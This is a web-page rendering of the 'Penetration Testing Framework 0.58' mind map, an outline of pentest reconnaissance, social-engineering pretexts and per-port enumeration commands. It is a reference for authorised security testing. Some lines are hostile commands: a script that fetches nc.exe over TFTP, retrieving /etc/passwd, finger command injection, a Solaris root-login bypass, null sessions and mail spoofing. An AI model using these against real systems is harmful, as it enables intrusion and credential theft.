Penetration Testing Framework 0.58

Get Started. It's Free
or sign up with your email address
Rocket clouds
Penetration Testing Framework 0.58 by Mind Map: Penetration Testing Framework 0.58

1. Manual Testing

1.1. Create Batch File (cmd.bat)

1.1.1. 1

1.1.1.1. cmd.exe

1.1.2. 2

1.1.2.1. echo off

1.1.2.2. command

1.1.2.3. echo on

1.2. Host Scripting File (cmd.vbs)

1.2.1. Option Explicit

1.2.2. Dim objShell

1.2.3. objShell.Run "%comspec% /k"

1.2.4. WScript.Quit

1.2.5. alternative functionality

1.2.5.1. objShell.Run "%comspec% /k c: & dir"

1.2.5.2. objShell.Run "%comspec% /k c: & cd temp & dir >temp.txt & notepad temp.txt"

1.2.5.3. objShell.Run "%comspec% /k c: & tftp -i ip_address GET nc.exe" :-)

1.3. iKat

1.3.1. Integrated Kiosk Attack Tool

1.3.1.1. Reconnaissance

1.3.1.2. FileSystem Links

1.3.1.3. Common Dialogs

1.3.1.4. Application Handlers

1.3.1.5. Browser Plugins

1.3.1.6. iKAT Tools

1.4. AT Command - priviledge escalation

1.4.1. AT HH:MM /interactive "cmd.exe"

1.4.2. AT HH:MM /interactive %comspec% /k

1.4.3. Untitled

1.5. Keyboard Shortcuts/ Hotkeys

1.5.1. Ctrl + h – View History

1.5.2. Ctrl + n – New Browser

1.5.3. Shift + Left Click – New Browser

1.5.4. Ctrl + o – Internet Address (browse feature)

1.5.5. Ctrl + p – Print (to file)

1.5.6. Right Click (Shift + F10)

1.5.6.1. Save Image As

1.5.6.2. View Source

1.5.7. F1 – Jump to URL

1.5.8. SHIFT+F1: Local Task List

1.5.9. SHIFT+F2: Toggle Title Bar

1.5.10. SHIFT+F3: Close Remote Application

1.5.11. CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del

1.5.12. CTRL+F2: Remote Task List

1.5.13. CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC

1.5.14. ALT+F2: Cycle through programs

1.5.15. ALT+PLUS: Alt+TAB

1.5.16. ALT+MINUS: ALT+SHIFT+TAB

2. inurl:Citrix/AccessPlatform/auth/login.aspx

3. X11 port 6000^ open

3.1. X11 Enumeration

3.1.1. List open windows

3.1.2. Authentication Method

3.1.2.1. Xauth

3.1.2.2. Xhost

3.2. X11 Exploitation

3.2.1. xwd

3.2.1.1. xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm

3.2.2. Keystrokes

3.2.2.1. Received

3.2.2.2. Transmitted

3.2.3. Screenshots

3.2.4. xhost +

3.3. Examine Configuration Files

3.3.1. /etc/Xn.hosts

3.3.2. /usr/lib/X11/xdm

3.3.2.1. Untitled

3.3.3. /usr/lib/X11/xdm/xsession

3.3.4. /usr/lib/X11/xdm/xsession-remote

3.3.5. /usr/lib/X11/xdm/xsession.0

3.3.6. /usr/lib/X11/xdm/xdm-config

3.3.6.1. DisplayManager*authorize:on

4. pwdump [-h][-o][-u][-p] machineName

5. Nabil contributed the AS/400 section.

6. Client Side Security

7. Back end files

7.1. .exe / .txt / .doc / .ppt / .pdf / .vbs / .pl / .sh / .bat / .sql / .xls / .mdb / .conf

8. Set objShell = CreateObject("WScript.Shell")

9. Check visible areas for sensitive information.

10. InitialProgram=c:\windows\system32\cmd.exe

11. txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c: \hostlist.txt

12. http://secunia.com/advisories/search/?search=citrix

13. Pre-Inspection Visit - template

14. Network Footprinting (Reconnaissance) The tester would attempt to gather as much information as possible about the selected network. Reconnaissance can take two forms i.e. active and passive. A passive attack is always the best starting point as this would normally defeat intrusion detection systems and other forms of protection etc. afforded to the network. This would usually involve trying to discover publicly available information by utilising a web browser and visiting newsgroups etc. An active form would be more intrusive and may show up in audit logs and may take the form of an attempted DNS zone transfer or a social engineering type of attack.

14.1. Untitled

14.1.1. Authoratitive Bodies

14.1.1.1. IANA - Internet Assigned Numbers Authority

14.1.1.2. ICANN - Internet Corporation for Assigned Names and Numbers.

14.1.1.3. NRO - Number Resource Organisation

14.1.1.4. RIR - Regional Internet Registry

14.1.1.4.1. AFRINIC - African Network Information Centre

14.1.1.4.2. APNIC - Asia Pacific Network Information Centre

14.1.1.4.3. ARIN - American Registry for Internet Numbers

14.1.1.4.4. LACNIC - Latin America & Caribbean Network Information Centre

14.1.1.4.5. RIPE - Reseaux IP Européens—Network Coordination Centre

14.1.2. Websites

14.1.2.1. Central Ops

14.1.2.1.1. Domain Dossier

14.1.2.1.2. Email Dossier

14.1.2.2. DNS Stuff

14.1.2.2.1. Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries.

14.1.2.3. Fixed Orbit

14.1.2.3.1. Autonomous System lookups and other online tools available.

14.1.2.4. Geektools

14.1.2.5. IP2Location

14.1.2.5.1. Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information.

14.1.2.6. Kartoo

14.1.2.6.1. Metasearch engine that visually presents its results.

14.1.2.7. MyIPNeighbors.com

14.1.2.7.1. Excellent site that gives you details of shared domains on the IP queried/ conversely IP to DNS resolution

14.1.2.8. My-IP-Neighbors.com

14.1.2.8.1. Excellent site that can be used if the above is down

14.1.2.9. myipneighbors.net

14.1.2.10. Netcraft

14.1.2.10.1. Online search tool allowing queries for host information.

14.1.2.11. Passive DNS Replication

14.1.2.11.1. Finds shared domains based on supplied IP addresses

14.1.2.11.2. Note: - Website utilised by nmap hostmap.nse script

14.1.2.12. Robtex

14.1.2.12.1. Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed.

14.1.2.12.2. Note: - Can be unreliable with old entries (Use CentralOps to verify)

14.1.2.13. Traceroute.org

14.1.2.13.1. Website listing a large number links to online traceroute resources.

14.1.2.14. Wayback Machine

14.1.2.14.1. Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.

14.1.2.15. Whois.net

14.1.3. Tools

14.1.3.1. Cheops-ng

14.1.3.2. Country whois

14.1.3.3. Domain Research Tool

14.1.3.4. Firefox Plugins

14.1.3.4.1. AS Number

14.1.3.4.2. Shazou

14.1.3.4.3. Firecat Suite

14.1.3.5. Gnetutil

14.1.3.6. Goolag Scanner

14.1.3.7. Greenwich

14.1.3.8. Maltego

14.1.3.9. GTWhois

14.1.3.10. Sam Spade

14.1.3.11. Smart whois

14.1.3.12. SpiderFoot

14.2. Internet Search

14.2.1. General Information

14.2.1.1. Web Investigator

14.2.1.2. Tracesmart

14.2.1.3. Friends Reunited

14.2.1.4. Ebay - profiles etc.

14.2.2. Financial

14.2.2.1. EDGAR - Company information, including real-time filings. US

14.2.2.2. Google Finance - General Finance Portal

14.2.2.3. Hoovers - Business Intelligence, Insight and Results. US and UK

14.2.2.4. Companies House UK

14.2.2.5. Land Registry UK

14.2.3. Phone book/ Electoral Role Information

14.2.3.1. 123people

14.2.3.1.1. http://www.123people.co.uk/s/firstname+lastname/world

14.2.3.2. 192.com

14.2.3.2.1. Electoral Role Search. UK

14.2.3.3. 411

14.2.3.3.1. Online White Pages and Yellow Pages. US

14.2.3.4. Untitled

14.2.3.4.1. Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US

14.2.3.5. BT.com. UK

14.2.3.5.1. Residential

14.2.3.5.2. Business

14.2.3.6. Pipl

14.2.3.6.1. Untitled

14.2.3.6.2. http://pipl.com/search/?Email=john%40example.com&CategoryID=4&Interface=1

14.2.3.6.3. http://pipl.com/search/?Username=????&CategoryID=5&Interface=1

14.2.3.7. Spokeo

14.2.3.7.1. http://www.spokeo.com/user?q=domain_name

14.2.3.7.2. http://www.spokeo.com/user?q=email_address

14.2.3.8. Yasni

14.2.3.8.1. http://www.yasni.co.uk/index.php?action=search&search=1&sh=&name=firstname+lastname&filter=Keyword

14.2.3.9. Zabasearch

14.2.3.9.1. People Search Engine. US

14.2.4. Generic Web Searching

14.2.4.1. Code Search

14.2.4.2. Forum Entries

14.2.4.3. Google Hacking Database

14.2.4.4. Google

14.2.4.4.1. Email Addresses

14.2.4.4.2. Contact Details

14.2.4.5. Newsgroups/forums

14.2.4.6. Blog Search

14.2.4.6.1. Yammer

14.2.4.6.2. Google Blog Search

14.2.4.6.3. Technorati

14.2.4.6.4. Jaiku

14.2.4.6.5. Present.ly

14.2.4.6.6. Twitter Network Browser

14.2.4.7. Search Engine Comparison/ Aggregator Sites

14.2.4.7.1. Clusty

14.2.4.7.2. Grokker

14.2.4.7.3. Zuula

14.2.4.7.4. Exalead

14.2.4.7.5. Delicious

14.2.5. Metadata Search

14.2.5.1. Untitled

14.2.5.1.1. MetaData Visualisation Sites

14.2.5.1.2. Tools

14.2.5.1.3. Wikipedia Metadata Search

14.2.6. Social/ Business Networks

14.2.6.1. Untitled

14.2.6.1.1. Africa

14.2.6.1.2. Australia

14.2.6.1.3. Belgium

14.2.6.1.4. Holland

14.2.6.1.5. Hungary

14.2.6.1.6. Iran

14.2.6.1.7. Japan

14.2.6.1.8. Korea

14.2.6.1.9. Poland

14.2.6.1.10. Russia

14.2.6.1.11. Sweden

14.2.6.1.12. UK

14.2.6.1.13. US

14.2.6.1.14. Assorted

14.2.7. Resources

14.2.7.1. OSINT

14.2.7.2. International Directory of Search Engines

14.3. DNS Record Retrieval from publically available servers

14.3.1. Types of Information Records

14.3.1.1. SOA Records - Indicates the server that has authority for the domain.

14.3.1.2. MX Records - List of a host’s or domain’s mail exchanger server(s).

14.3.1.3. NS Records - List of a host’s or domain’s name server(s).

14.3.1.4. A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS.

14.3.1.5. PTR Records - Lists a host’s domain name, host identified by its IP address.

14.3.1.6. SRV Records - Service location record.

14.3.1.7. HINFO Records - Host information record with CPU type and operating system.

14.3.1.8. TXT Records - Generic text record.

14.3.1.9. CNAME - A host’s canonical name allows additional names/ aliases to be used to locate a computer.

14.3.1.10. RP - Responsible person for the domain.

14.3.2. Database Settings

14.3.2.1. Version.bind

14.3.2.2. Serial

14.3.2.3. Refresh

14.3.2.4. Retry

14.3.2.5. Expiry

14.3.2.6. Minimum

14.3.3. Sub Domains

14.3.4. Internal IP ranges

14.3.4.1. Reverse DNS for IP Range

14.3.5. Zone Transfer

14.4. Social Engineering

14.4.1. Remote

14.4.1.1. Phone

14.4.1.1.1. Scenarios

14.4.1.1.2. Results

14.4.1.1.3. Contact Details

14.4.1.2. Email

14.4.1.2.1. Scenarios

14.4.1.2.2. Software

14.4.1.2.3. Results

14.4.1.2.4. Contact Details

14.4.1.3. Other

14.4.2. Local

14.4.2.1. Personas

14.4.2.1.1. Name

14.4.2.1.2. Phone

14.4.2.1.3. Email

14.4.2.1.4. Business Cards

14.4.2.2. Contact Details

14.4.2.2.1. Name

14.4.2.2.2. Phone number

14.4.2.2.3. Email

14.4.2.2.4. Room number

14.4.2.2.5. Department

14.4.2.2.6. Role

14.4.2.3. Scenarios

14.4.2.3.1. New IT employee

14.4.2.3.2. Fire Inspector

14.4.2.4. Results

14.4.2.5. Maps

14.4.2.5.1. Satalitte Imagery

14.4.2.5.2. Building layouts

14.4.2.6. Other

14.5. Dumpster Diving

14.5.1. Rubbish Bins

14.5.2. Contract Waste Removal

14.5.3. Ebay ex-stock sales i.e. HDD

14.6. Web Site copy

14.6.1. htttrack

14.6.2. teleport pro

14.6.3. Black Widow

15. Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: OS Fingerprinting Remote applications being served. OS fingerprinting or TCP/IP stack fingerprinting is the process of determining the operating system being utilised on a remote host. This is carried out by analyzing packets received from the host in question. There are two distinct ways to OS fingerprint, actively (i.e. nmap) or passively (i.e. scanrand). Passive OS fingerprinting determines the remote OS utilising the packets received only and does not require any packets to be sent. Active OS fingerprinting is very noisy and requires packets to be sent to the remote host and waits for a reply, (or lack thereof). Disparate OS's respond differently to certain types of packet, (the response is governed by an RFC and any proprietary responses the vendor (notably Microsoft) has enabled within the system) and so custom packets may be sent. Remote applications being served on a host can be determined by an open port on that host. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.

15.1. Default Port Lists

15.1.1. Windows

15.1.2. *nix

15.2. Enumeration tools and techniques - The vast majority can be used generically, however, certain bespoke application require there own specific toolsets to be used. Default passwords are platform and vendor specific

15.2.1. General Enumeration Tools

15.2.1.1. nmap

15.2.1.1.1. nmap -n -A -PN -p- -T Agressive -iL nmap.targetlist -oX nmap.syn.results.xml

15.2.1.1.2. nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results

15.2.1.1.3. nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results

15.2.1.1.4. nmap -A -sS -PN -n --script:all ip_address --reason

15.2.1.1.5. grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list

15.2.1.2. netcat

15.2.1.2.1. nc -v -n IP_Address port

15.2.1.2.2. nc -v -w 2 -z IP_Address port_range/port_number

15.2.1.3. amap

15.2.1.3.1. amap -bqv 192.168.1.1 80

15.2.1.3.2. amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]

15.2.1.4. xprobe2

15.2.1.4.1. xprobe2 192.168.1.1

15.2.1.5. sinfp

15.2.1.5.1. ./sinfp.pl -i -p

15.2.1.6. nbtscan

15.2.1.6.1. nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)

15.2.1.7. hping

15.2.1.7.1. hping ip_address

15.2.1.8. scanrand

15.2.1.8.1. scanrand ip_address:all

15.2.1.9. unicornscan

15.2.1.9.1. unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/ CIDR_NET_MASK: S-E

15.2.1.10. netenum

15.2.1.10.1. netenum network/netmask timeout

15.2.1.11. fping

15.2.1.11.1. fping -a -d hostname/ (Network/Subnet_Mask)

15.2.2. Firewall Specific Tools

15.2.2.1. firewalk

15.2.2.1.1. firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]

15.2.2.2. ftester

15.2.2.2.1. host 1 ./ftestd -i eth0 -v host 2 ./ftest -f ftest.conf -v -d 0.01 then ./freport ftest.log ftestd.log

15.2.3. Default Passwords (Examine list)

15.2.3.1. Passwords A

15.2.3.2. Passwords B

15.2.3.3. Passwords C

15.2.3.4. Passwords D

15.2.3.5. Passwords E

15.2.3.6. Passwords F

15.2.3.7. Passwords G

15.2.3.8. Passwords H

15.2.3.9. Passwords I

15.2.3.10. Passwords J

15.2.3.11. Passwords K

15.2.3.12. Passwords L

15.2.3.13. Passwords M

15.2.3.14. Passwords N

15.2.3.15. Passwords O

15.2.3.16. Passwords P

15.2.3.17. Passwords R

15.2.3.18. Passwords S

15.2.3.19. Passwords T

15.2.3.20. Passwords U

15.2.3.21. Passwords V

15.2.3.22. Passwords W

15.2.3.23. Passwords X

15.2.3.24. Passwords Y

15.2.3.25. Passwords Z

15.2.3.26. Passwords (Numeric)

15.3. Active Hosts

15.3.1. Open TCP Ports

15.3.2. Closed TCP Ports

15.3.3. Open UDP Ports

15.3.4. Closed UDP Ports

15.3.5. Service Probing

15.3.5.1. SMTP Mail Bouncing

15.3.5.2. Banner Grabbing

15.3.5.2.1. Other

15.3.5.2.2. HTTP

15.3.5.2.3. HTTPS

15.3.5.2.4. SMTP

15.3.5.2.5. POP3

15.3.5.2.6. FTP

15.3.6. ICMP Responses

15.3.6.1. Type 3 (Port Unreachable)

15.3.6.2. Type 8 (Echo Request)

15.3.6.3. Type 13 (Timestamp Request)

15.3.6.4. Type 15 (Information Request)

15.3.6.5. Type 17 (Subnet Address Mask Request)

15.3.6.6. Responses from broadcast address

15.3.7. Source Port Scans

15.3.7.1. TCP/UDP 53 (DNS)

15.3.7.2. TCP 20 (FTP Data)

15.3.7.3. TCP 80 (HTTP)

15.3.7.4. TCP/UDP 88 (Kerberos)

15.3.8. Firewall Assessment

15.3.8.1. Firewalk

15.3.8.2. TCP/UDP/ICMP responses

15.3.9. OS Fingerprint

16. Enumeration

16.1. Daytime port 13 open

16.1.1. nmap nse script

16.1.1.1. daytime

16.2. FTP port 21 open

16.2.1. Fingerprint server

16.2.1.1. telnet ip_address 21 (Banner grab)

16.2.1.2. Run command ftp ip_address

16.2.1.3. [email protected]

16.2.1.4. Check for anonymous access

16.2.1.4.1. ftp ip_addressUsername: anonymous OR anonPassword: [email protected]

16.2.2. Password guessing

16.2.2.1. Hydra brute force

16.2.2.2. medusa

16.2.2.3. Brutus

16.2.3. Examine configuration files

16.2.3.1. ftpusers

16.2.3.2. ftp.conf

16.2.3.3. proftpd.conf

16.2.4. MiTM

16.2.4.1. pasvagg.pl

16.3. SSH port 22 open

16.3.1. Fingerprint server

16.3.1.1. telnet ip_address 22 (banner grab)

16.3.1.2. scanssh

16.3.1.2.1. scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask

16.3.2. Password guessing

16.3.2.1. ssh [email protected]_address

16.3.2.2. guess-who

16.3.2.2.1. ./b -l username -h ip_address -p 22 -2 < password_file_location

16.3.2.3. Hydra brute force

16.3.2.4. brutessh

16.3.2.5. Ruby SSH Bruteforcer

16.3.3. Examine configuration files

16.3.3.1. ssh_config

16.3.3.2. sshd_config

16.3.3.3. authorized_keys

16.3.3.4. ssh_known_hosts

16.3.3.5. .shosts

16.3.4. SSH Client programs

16.3.4.1. tunnelier

16.3.4.2. winsshd

16.3.4.3. putty

16.3.4.4. winscp

16.4. Telnet port 23 open

16.4.1. Fingerprint server

16.4.1.1. telnet ip_address

16.4.1.1.1. Common Banner ListOS/BannerSolaris 8/SunOS 5.8Solaris 2.6/SunOS 5.6Solaris 2.4 or 2.5.1/Unix(r) System V Release 4.0 (hostname)SunOS 4.1.x/SunOS Unix (hostname)FreeBSD/FreeBSD/i386 (hostname) (ttyp1)NetBSD/NetBSD/i386 (hostname) (ttyp1)OpenBSD/OpenBSD/i386 (hostname) (ttyp1)Red Hat 8.0/Red Hat Linux release 8.0 (Psyche)Debian 3.0/Debian GNU/Linux 3.0 / hostnameSGI IRIX 6.x/IRIX (hostname)IBM AIX 4.1.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.IBM AIX 4.2.x or 4.3.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.Nokia IPSO/IPSO (hostname) (ttyp0)Cisco IOS/User Access VerificationLivingston ComOS/ComOS - Livingston PortMaster

16.4.1.2. telnetfp

16.4.2. Password Attack

16.4.2.1. Untitled

16.4.2.2. Brutus

16.4.2.3. Hydra brute force

16.4.2.4. telnet -l "-froot" hostname (Solaris 10+)

16.4.3. Examine configuration files

16.4.3.1. /etc/xinetd.d/telnet

16.4.3.2. /etc/xinetd.d/stelnet

16.5. Sendmail Port 25 open

16.5.1. Fingerprint server

16.5.1.1. telnet ip_address 25 (banner grab)

16.5.2. Mail Server Testing

16.5.2.1. Enumerate users

16.5.2.1.1. VRFY username (verifies if username exists - enumeration of accounts)

16.5.2.1.2. EXPN username (verifies if username is valid - enumeration of accounts)

16.5.2.2. Mail Spoof Test

16.5.2.2.1. HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT

16.5.2.3. /etc/inetd.conf

16.5.2.4. Mail Relay Test

16.5.2.4.1. Untitled

16.5.3. Examine Configuration Files

16.5.3.1. sendmail.cf

16.5.3.2. submit.cf

16.6. DNS port 53 open

16.6.1. Fingerprint server/ service

16.6.1.1. host

16.6.1.1.1. host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ] -v verbose format -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR. -a Same as –t ANY. -l Zone transfer (if allowed). -f Save to a specified filename.

16.6.1.2. nslookup

16.6.1.2.1. nslookup [ -option ... ] [ host-to-find | - [ server ]]

16.6.1.3. dig

16.6.1.3.1. dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]

16.6.1.4. whois-h Use the named host to resolve the query -a Use ARIN to resolve the query -r Use RIPE to resolve the query -p Use APNIC to resolve the query -Q Perform a quick lookup

16.6.2. DNS Enumeration

16.6.2.1. Bile Suite

16.6.2.1.1. perl BiLE.pl [website] [project_name]

16.6.2.1.2. perl BiLE-weigh.pl [website] [input file]

16.6.2.1.3. perl vet-IPrange.pl [input file] [true domain file] [output file] <range>

16.6.2.1.4. perl vet-mx.pl [input file] [true domain file] [output file]

16.6.2.1.5. perl exp-tld.pl [input file] [output file]

16.6.2.1.6. perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]

16.6.2.1.7. perl jarf-rev [subnetblock] [nameserver]

16.6.2.2. txdns

16.6.2.2.1. txdns -rt -t domain_name

16.6.2.2.2. txdns -x 50 -bb domain_name

16.6.2.3. nmap nse scripts

16.6.2.3.1. dns-random-srcport

16.6.2.3.2. dns-random-txid

16.6.2.3.3. dns-recursion

16.6.2.3.4. dns-zone-transfer

16.6.3. Examine Configuration Files

16.6.3.1. host.conf

16.6.3.2. resolv.conf

16.6.3.3. named.conf

16.7. perl qtrace.pl [ip_address_file] [output_file]

16.8. TFTP port 69 open

16.8.1. TFTP Enumeration

16.8.1.1. tftp ip_address PUT local_file

16.8.1.2. tftp ip_address GET conf.txt (or other files)

16.8.1.3. Solarwinds TFTP server

16.8.1.4. tftp – i <IP> GET /etc/passwd (old Solaris)

16.8.2. TFTP Bruteforcing

16.8.2.1. TFTP bruteforcer

16.8.2.2. Cisco-Torch

16.9. Finger Port 79 open

16.9.1. User enumeration

16.9.1.1. finger 'a b c d e f g h' @example.com

16.9.1.2. finger adm[email protected]

16.9.1.3. finger [email protected]

16.9.1.4. finger [email protected]

16.9.1.5. finger [email protected]

16.9.1.6. finger **@example.com

16.9.1.7. finger [email protected]

16.9.1.8. finger @example.com

16.9.1.9. nmap nse script

16.9.1.9.1. finger

16.9.2. Command execution

16.9.2.1. finger "|/bin/[email protected]"

16.9.2.2. finger "|/bin/ls -a /@example.com"

16.9.3. Finger Bounce

16.9.3.1. finger [email protected]@victim

16.9.3.2. finger @[email protected]

16.10. Web Ports 80,8080 etc. open

16.10.1. Fingerprint server

16.10.1.1. Telnet ip_address port

16.10.1.2. Firefox plugins

16.10.1.2.1. All

16.10.1.2.2. Specific

16.10.2. Crawl website

16.10.2.1. lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source

16.10.2.2. httprint

16.10.2.3. Metagoofil

16.10.2.3.1. metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html

16.10.3. Web Directory enumeration

16.10.3.1. Nikto

16.10.3.1.1. nikto [-h target] [options]

16.10.3.2. DirBuster

16.10.3.3. Wikto

16.10.3.4. Goolag Scanner

16.10.4. Vulnerability Assessment

16.10.4.1. Manual Tests

16.10.4.1.1. Default Passwords

16.10.4.1.2. Install Backdoors

16.10.4.1.3. Method Testing

16.10.4.1.4. Upload Files

16.10.4.1.5. View Page Source

16.10.4.1.6. Input Validation Checks

16.10.4.1.7. Automated table and column iteration

16.10.4.2. Vulnerability Scanners

16.10.4.2.1. Acunetix

16.10.4.2.2. Grendelscan

16.10.4.2.3. NStealth

16.10.4.2.4. Obiwan III

16.10.4.2.5. w3af

16.10.4.3. Specific Applications/ Server Tools

16.10.4.3.1. Domino

16.10.4.3.2. Joomla

16.10.4.3.3. aspaudit.pl

16.10.4.3.4. Vbulletin

16.10.4.3.5. ZyXel

16.10.5. Proxy Testing

16.10.5.1. Burpsuite

16.10.5.2. Crowbar

16.10.5.3. Interceptor

16.10.5.4. Paros

16.10.5.5. Requester Raw

16.10.5.6. Suru

16.10.5.7. WebScarab

16.10.6. Examine configuration files

16.10.6.1. Generic

16.10.6.1.1. Examine httpd.conf/ windows config files

16.10.6.2. JBoss

16.10.6.2.1. JMX Console http://<IP>:8080/jmxconcole/

16.10.6.3. Joomla

16.10.6.3.1. configuration.php

16.10.6.3.2. diagnostics.php

16.10.6.3.3. joomla.inc.php

16.10.6.3.4. config.inc.php

16.10.6.4. Mambo

16.10.6.4.1. configuration.php

16.10.6.4.2. config.inc.php

16.10.6.5. Wordpress

16.10.6.5.1. setup-config.php

16.10.6.5.2. wp-config.php

16.10.6.6. ZyXel

16.10.6.6.1. /WAN.html (contains PPPoE ISP password)

16.10.6.6.2. /WLAN_General.html and /WLAN.html (contains WEP key)

16.10.6.6.3. /rpDyDNS.html (contains DDNS credentials)

16.10.6.6.4. /Firewall_DefPolicy.html (Firewall)

16.10.6.6.5. /CF_Keyword.html (Content Filter)

16.10.6.6.6. /RemMagWWW.html (Remote MGMT)

16.10.6.6.7. /rpSysAdmin.html (System)

16.10.6.6.8. /LAN_IP.html (LAN)

16.10.6.6.9. /NAT_General.html (NAT)

16.10.6.6.10. /ViewLog.html (Logs)

16.10.6.6.11. /rpFWUpload.html (Tools)

16.10.6.6.12. /DiagGeneral.html (Diagnostic)

16.10.6.6.13. /RemMagSNMP.html (SNMP Passwords)

16.10.6.6.14. /LAN_ClientList.html (Current DHCP Leases)

16.10.6.6.15. Config Backups

16.10.7. Examine web server logs

16.10.7.1. c:\winnt\system32\Logfiles\W3SVC1

16.10.7.1.1. awk -F " " '{print $3,$11} filename | sort | uniq

16.10.8. References

16.10.8.1. White Papers

16.10.8.1.1. Cross Site Request Forgery: An Introduction to a Common Web Application Weakness

16.10.8.1.2. Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity

16.10.8.1.3. Blind Security Testing - An Evolutionary Approach

16.10.8.1.4. Command Injection in XML Signatures and Encryption

16.10.8.1.5. Input Validation Cheat Sheet

16.10.8.1.6. SQL Injection Cheat Sheet

16.10.8.2. Books

16.10.8.2.1. Hacking Exposed Web 2.0

16.10.8.2.2. Hacking Exposed Web Applications

16.10.8.2.3. The Web Application Hacker's Handbook

16.10.9. Exploit Frameworks

16.10.9.1. Brute-force Tools

16.10.9.1.1. Acunetix

16.10.9.2. Metasploit

16.10.9.3. w3af

16.11. Portmapper port 111 open

16.11.1. rpcdump.py

16.11.1.1. rpcdump.py username:[email protected]_Address port/protocol (i.e. 80/HTTP)

16.11.2. rpcinfo

16.11.2.1. rpcinfo [options] IP_Address

16.12. NTP Port 123 open

16.12.1. NTP Enumeration

16.12.1.1. ntpdc -c monlist IP_ADDRESS

16.12.1.2. ntpdc -c sysinfo IP_ADDRESS

16.12.1.3. ntpq

16.12.1.3.1. host

16.12.1.3.2. hostname

16.12.1.3.3. ntpversion

16.12.1.3.4. readlist

16.12.1.3.5. version

16.12.2. Examine configuration files

16.12.2.1. ntp.conf

16.12.3. nmap nse script

16.12.3.1. ntp-info

16.13. NetBIOS Ports 135-139,445 open

16.13.1. NetBIOS enumeration

16.13.1.1. Enum

16.13.1.1.1. enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>

16.13.1.2. Null Session

16.13.1.2.1. net use \\192.168.1.1\ipc$ "" /u:""

16.13.1.3. Smbclient

16.13.1.3.1. smbclient -L //server/share password options

16.13.1.4. Superscan

16.13.1.4.1. Enumeration tab.

16.13.1.5. user2sid/sid2user

16.13.1.6. Winfo

16.13.2. NetBIOS brute force

16.13.2.1. Hydra

16.13.2.2. Brutus

16.13.2.3. Cain & Abel

16.13.2.4. getacct

16.13.2.5. NAT (NetBIOS Auditing Tool)

16.13.3. Examine Configuration Files

16.13.3.1. Smb.conf

16.13.3.2. lmhosts

16.14. SNMP port 161 open

16.14.1. Default Community Strings

16.14.1.1. public

16.14.1.2. private

16.14.1.3. cisco

16.14.1.3.1. cable-docsis

16.14.1.3.2. ILMI

16.14.2. MIB enumeration

16.14.2.1. Windows NT

16.14.2.1.1. .1.3.6.1.2.1.1.5 Hostnames

16.14.2.1.2. .1.3.6.1.4.1.77.1.4.2 Domain Name

16.14.2.1.3. .1.3.6.1.4.1.77.1.2.25 Usernames

16.14.2.1.4. .1.3.6.1.4.1.77.1.2.3.1.1 Running Services

16.14.2.1.5. .1.3.6.1.4.1.77.1.2.27 Share Information

16.14.2.2. Solarwinds MIB walk

16.14.2.3. Getif

16.14.2.4. snmpwalk

16.14.2.4.1. snmpwalk -v <Version> -c <Community string> <IP>

16.14.2.5. Snscan

16.14.2.6. Applications

16.14.2.6.1. ZyXel

16.14.2.7. nmap nse script

16.14.2.7.1. snmp-sysdescr

16.14.3. SNMP Bruteforce

16.14.3.1. onesixtyone

16.14.3.1.1. onesixytone -c SNMP.wordlist <IP>

16.14.3.2. cat

16.14.3.2.1. ./cat -h <IP> -w SNMP.wordlist

16.14.3.3. Solarwinds SNMP Brute Force

16.14.3.4. ADMsnmp

16.14.3.5. nmap nse script

16.14.3.5.1. snmp-brute

16.14.4. Examine SNMP Configuration files

16.14.4.1. snmp.conf

16.14.4.2. snmpd.conf

16.14.4.3. snmp-config.xml

16.15. LDAP Port 389 Open

16.15.1. ldap enumeration

16.15.1.1. ldapminer

16.15.1.1.1. ldapminer -h ip_address -p port (not required if default) -d

16.15.1.2. luma

16.15.1.2.1. Gui based tool

16.15.1.3. ldp

16.15.1.3.1. Gui based tool

16.15.1.4. openldap

